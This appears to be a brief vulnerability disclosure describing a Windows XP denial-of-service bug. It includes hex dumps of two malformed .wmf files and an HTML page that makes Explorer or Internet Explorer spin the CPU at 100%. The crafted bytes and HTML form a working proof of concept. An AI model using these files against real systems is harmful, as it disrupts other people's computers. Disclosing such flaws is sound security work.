WindowsXP malformed .wmf files DoS

Here is an example of malformed .wmf file which will cause DoS. Put this file in \
arbitrary folder (be sure that file has .wmf extension, otherwise this wouldn't \
work). Open that folder with Windows Explorer, and just move mouse over malformed \
file. CPU usage will rise to 100%, and stay that way. During this condition you can \
work with explorer, but it behaves very weird. It doesn't help if you close all \
explorer's windows, you must restart explorer.exe, only then CPU usage will get down \
to normal. Instead of "mouseover" you could doubleclick on file to produce same \
effect.

Here is .wmf file:

00000000 :01 00 09 00 00 03 0E 00 - 00 00 01 00 05 00 00 00
00000010 :00 00 00 00 00 00 0B 02 - FF FF FF FF

Now, this was "bare" .wmf file, and if you put a link in html pointing to it, IE \
won't render it, and there is no problem. What we need is a placeable metafile, and \
this is one:

00000000 :D7 CD C6 9A 00 00 00 00 - 00 00 A1 21 EC 29 EC 09
00000010 :00 00 00 00 B0 56 01 00 - 09 00 00 03 0E 00 00 00
00000020 :01 00 05 00 00 00 00 00 - 00 00 00 00 0B 02 00 00
00000030 :00 00

测试程序：

<html><body><img src="test.wmf"></body></html>

When you open html document, IE will try to render test.wmf and CPU is again on 100%, \
and again you have to restart IE to slow it down. Malicious website could easily do \
the same.